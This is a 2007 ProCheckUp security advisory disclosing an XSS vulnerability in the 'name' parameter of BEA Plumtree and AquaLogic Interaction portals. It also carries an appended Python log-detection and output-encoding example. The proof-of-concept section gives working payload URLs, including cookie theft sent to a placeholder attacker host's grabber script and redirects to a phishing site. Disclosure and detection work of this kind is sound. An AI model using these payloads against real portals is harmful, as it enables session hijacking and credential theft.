PR06-12 - XSS on BEA Plumtree Foundation and AquaLogic Interaction portals

Vulnerability found: 12 September 2006
Vendor informed: 18 May 2007
Severity level: Medium/High
Credits: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com). ProCheckUp thanks BEA Systems for their co-operation.
Description: BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are vulnerable to an XSS vulnerability affecting the 'name' parameter, which is submitted to the '/portal/server.pt' server-side script.

Consequences

Scripting code can be run within the security context of the target site. User accounts can be hijacked. Advanced phishing attacks can be launched.

Note

This vulnerability could be considered a medium-high risk (rather than medium) where admin users are targeted, since a successful attack then gives the attacker administrative privileges on the target Plumtree/AquaLogic Portal.

Successfully tested on

BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.

BID: 27893

Proof of concept:
The following requests launch a JavaScript alert box in the user's web browser, simply to prove that it is possible to run scripting code in the victim's web browser.

Please note that '%22;}%3C/script%3E' is added at the beginning of every payload in order to make the overall HTML document syntactically correct, thus increasing the chance of the attack working on different web browser types.

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>

https://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--

The following requests allow session hijacking through cookie theft:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a third-party 'spoof' site which would perform a phishing attack on the victim:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://[phisherssite]"</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[phisherssite]%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This allows advanced phishing attacks by inserting an HTML form within the context of the victim website.

How to fix:
This issue will be addressed in the 6.5 release of AquaLogic Interaction.
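As an added, defender-side example (not code from the advisory, ProCheckUp or BEA): a check over constructed access-log lines that flags '/portal/server.pt' requests whose percent-decoded 'name' value contains a script-context breakout of the kind shown above (including a double-encoded variant), together with the output encoding that would stop such a value from terminating a JavaScript string or the script block it sits in. The log format, sample lines and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote
# Constructed sample access-log lines: one benign request, two carrying the
# script-context breakouts described in the advisory, one double-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2006:10:01:02 +0100] "GET /portal/server.pt?open=space&name=Finance HTTP/1.1" 200 512
10.0.0.9 - - [12/Sep/2006:10:02:17 +0100] "GET /portal/server.pt?open=space&name=%3C/SCRIPT%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
10.0.0.9 - - [12/Sep/2006:10:03:44 +0100] "GET /portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%3C!-- HTTP/1.1" 200 512
10.0.0.7 - - [12/Sep/2006:10:04:00 +0100] "GET /portal/server.pt?open=space&name=%2522;%257D HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
# A closing/opening <script> tag, or the '";}' sequence that ends a JS string and block.
BREAKOUT_RE = re.compile(r'</script|<script|";\}', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2522) are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def query_values(query, key):
    """Values of `key` in a raw query string, split on '&' only (a ';' stays in the value)."""
    return [unquote(v) for k, _, v in (p.partition("=") for p in query.split("&")) if k == key]

def flag_script_breakouts(log_text):
    """Return (client_ip, decoded_name) for server.pt requests with a breakout in 'name'."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/portal/server.pt"):
            continue
        for raw in query_values(url.query, "name"):
            decoded = fully_decode(raw)
            if BREAKOUT_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits

def js_string_encode(value):
    """\\uXXXX-encode everything but ASCII alphanumerics for a JS string literal, so
    '"', ';', '}', '<' and '/' cannot end the string or the <script> block."""
    units = value.encode("utf-16-be")  # astral characters become surrogate pairs
    return "".join(chr(u) if u < 128 and chr(u).isalnum() else "\\u%04x" % u
                   for u in (int.from_bytes(units[i:i + 2], "big") for i in range(0, len(units), 2)))
```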
References:
http://www.procheckup.com/research/views/vulnerabilities

BEA's BEA08-186.00 advisory:
http://dev2dev.bea.com/advisoriesnotifications/
Legal:
Copyright 2007 ProCheckUp Ltd.

All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.
